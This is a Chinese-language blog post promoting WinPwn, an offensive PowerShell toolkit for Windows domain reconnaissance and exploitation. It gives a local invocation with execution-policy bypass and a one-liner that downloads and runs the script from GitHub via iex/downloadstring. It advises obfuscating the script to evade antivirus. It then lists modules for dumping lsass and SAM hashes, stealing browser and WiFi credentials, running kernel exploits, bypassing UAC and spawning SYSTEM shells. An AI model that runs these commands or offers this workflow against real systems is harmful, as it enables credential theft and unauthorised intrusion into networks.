域信息收集自动脚本​WinPwn

时间:2022-07-22
本文章向大家介绍域信息收集自动脚本​WinPwn,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

WinPwn

自动化尽可能多的内部渗透测试流程(侦察和开发)具有自动代理识别和集成功能的脚本。

本地调用

powershell.exe -exec bypass -command "& {import-module  C:Users17782DesktopWinPwn-masterWinPwn-masteroffline_WinPwn.ps1;localreconmodules}"

远程下载调用

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

绕杀软需要自己混淆或者手动对触发器字符串进行编码。

具体功能有:

  • Inveigh ->在新的控制台窗口中执行Inveigh,集成了会话管理(Invoke-TheHash)的SMB-Relay攻击
  • sessionGopher ->执行Sessiongopher询问您参数
  • kittielocal ->
    • 模糊的调用-Mimikatz版本
    • 内存中的Safetykatz
    • 使用rundll32技术转储lsass
    • 下载并运行混淆的Lazagne
    • 转储浏览器凭证
    • 定制的Mimikittenz版本
    • 窃取Wifi凭证
    • 转储SAM文件NTLM哈希
  • localreconmodules ->
    • 收集已安装的软件,易受攻击的软件,共享,网络信息,组,特权等等
    • 检查典型的漏洞,如SMB签名,LLMNR中毒,MITM6,通过HTTP的WSUS
    • 检查Powershell事件日志中的凭证或其他敏感信息
    • 收集浏览器凭证和历史记录
    • 在注册表和文件系统中搜索密码
    • 查找敏感文件(配置文件,RDP文件,Keepass数据库)
    • 在本地系统上搜索.NET Binaries
    • 可选:Get-Computerdetails(Powersploit)和PSRecon
  • domainreconmodules ->
    • 收集各种域信息以进行手动检查
    • 在说明字段中找到广告密码
    • 搜索潜在的敏感域共享文件
    • 枚举不受约束的委派系统/用户
    • 生成猎犬报告
    • 用于域系统的MS17-10扫描仪
    • 适用于域系统的Bluekeep扫描仪
    • SQL Server发现和审核功能-PowerUpSQL
    • MS-RPRN检查域控制器或所有系统
    • Grouper2的组策略审核
    • 使用ADRecon在CSV文件(如果已安装Excel,则为XLS)中生成AD报告。
    • 检查打印机的常见问题
    • 搜索基于资源的约束委派攻击路径
  • Privescmodules
    • itm4ns调用-PrivescCheck
    • winPEAS
    • Powersploits PowerUp Allchecks,Sherlock,GPPPasswords
    • DLL劫持,文件权限,注册表权限和弱键,烂/多汁土豆检查
  • kernelexploits ->
    • MS15-077-(XP / Vista / Win7 / Win8 / 2000/2003/2008/2012)仅x86!
    • MS16-032-(2008/7/8/10/2012)!
    • MS16-135-(仅WS2k16)!
    • CVE-2018-8120-2018年5月,Windows 7 SP1 / 2008 SP2,2008 R2 SP1!
    • CVE-2019-0841-2019年4月!
    • CVE-2019-1069-Polarbear硬链接,需要凭据-2019年6月!
    • CVE-2019-1129 / 1130-竞争状况,需要多个核心-2019年7月!
    • CVE-2019-1215-2019年9月-仅x64!
    • CVE-2020-0638-2020年2月-仅x64!
    • CVE-2020-0796-SMBGhost
  • UACBypass ->
    • UAC Magic,基于James Forshaw在UAC上的三篇文章
    • UAC绕过cmstp技术,作者:Oddvar Moe
    • DiskCleanup UAC旁路,James Forshaw提供
    • DccwBypassUAC技术,作者Ernesto Fernandez和Thomas Vanhoutte
  • SYSTEMShell ->
    • 使用CreateProcess弹出系统shell
    • 使用NamedPipe模拟模仿Pop System Shell
    • 使用令牌操作的Pop System Shell
    • 使用UsoClient DLL加载或CreateProcess绑定系统shell

更多功能,大家可以自行到github上看文档,这个工具不错的。

https://github.com/S3cur3Th1sSh1t/WinPwn#sessiongopher---executes-sessiongopher-asking-you-for-parameters